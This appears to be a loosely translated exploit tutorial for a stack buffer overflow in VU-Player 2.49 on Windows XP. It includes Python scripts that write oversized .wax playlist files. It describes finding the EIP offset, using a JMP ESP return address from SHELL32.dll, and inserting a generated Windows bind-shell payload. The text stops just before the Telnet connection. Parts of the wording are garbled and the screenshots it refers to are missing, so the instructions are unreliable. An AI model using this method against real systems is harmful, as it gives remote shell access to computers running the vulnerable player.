DIRECT RETURN - EXPLOIT VU-PLAYER

BUFFER OVERFLOW

Before we do we exploit our target first set. Here we target an application with version VU-Player 2.49

below is a drawing application which we will exploit

After that we see where the location of the application we can run the output of the fuzzer.
suppose for example in the open playlist here we can run the mp3 that contains lots of string AAAAAAAAAAAAA and we can save the extended. wax,. m3u,. VPL,. pls,. ASX, and. cue.

or we could have found through the mini control the visual

 Then we started to create a file, we select only the extended. Wax, whatever you want to use which .....
You can type the following script.

#!/usr/bin/python

filename = 'lagi patah hati.wax'

buffer='\x41' * 1000

file=open(filename,'write')

file.write(buffer)

file.close()

when the file already contains the string fuzzer A total of 1000 with the extended. wax to run directly on VUPlayer application if the application is not lost or crash or hang.
Then you just add the buffer, but it's up to you to how to make the application crash and not too excessive.
Here we give only the 5000 bufferx like the script below,

#!/usr/bin/python

filename = 'lagi patah hati.wax'

buffer='\x41' * 5000

file=open(filename,'write')

file.write(buffer)

file.close()

when it crashes we proceed to the next step by running the application in OllyDbg.
and you can share the results file fuzzer to activate windows xp by SSH, apache and mysql on your Backtrack and open a browser on your windows xp to type the ip address in backtrack.    

then open your OllyDbg and run the application VUPlayer then play the file with the name of the fuzzer
lagi patah hati.wax, so it appears as shown below.
Register here EIP is affected by 414141414141

then create a string of 5000 the same as the number of buffers in the earlier script, the command
./pattern_creat rb 5000
and coffee to the fuzzer, follow the instructions below.

after that run the file Fazer is in the same manner as above.

Here we begin to calculate the value of EIP and ESP with the following command

below we can see in the 3000 buffer was replaced with a 417 and plus the
buffer + = '\ XEF \ xBE \ xAD \ xDE' after it in the store.

Then run the fuzzer with the same process as above.
Below shows that the value of existing on registers EIP have been turned into DEADBEEF,
is trying to do the writing on the ESP.

then add more buffer + = '\ xCC' * 1000, This will overwrite the existing value in the registers ESP.

then run again the same as the ones above.
below we can see that it was stricken with cccccccccc.

The next stage is to find  JMP ESP in the memory application by clicking view --> executable modules later double click on SHEL32.dll

 then proceed to click right select a search for --> command or can be directly ctrl+f on the keyboard.

o

and write the JMP ESP as below and click on find

in addition to the script that we can see the JMP ESP is 7C9D30D7 and write on fuzzer script  we are on the side like a buffer + = '\ xD7 \ x30 \ x9D \ x7C'

then run again still the same as the above process, and we get a result like below .

Now we try breackpoint here to find out whether there is access to the address 7C9D30D7 by the register EIP.

 and below are the results

Now we proceed to make the PAYLOAD
and into the browser type the address 127.0.0.1:55555
then click payload and select a category 0s: win32 then select the Windows Shell Bind
then fill in the fields as below.

below we can see the PAYLOAD that we have made earlier

and copy the payload is on our fuzzer script like below.

then you run back the results of the fuzzer above, when the application is immediately lost means that still does not work, we think what is missing from the script above.
let's go back to the manufacture of payload may be something wrong with the payload.

for manufacturing is still the same as above, we actually just refresh it just because we make every payload it is not necessarily the same contents all.

that we can do our payloadnya copy to the fuzzer, then we run back the results of the fuzzer.
when the successful application will hang can not click on the menu of the application
examples like the following picture appears that the application is Hang.

when it's like the above you can run Telnet with the following command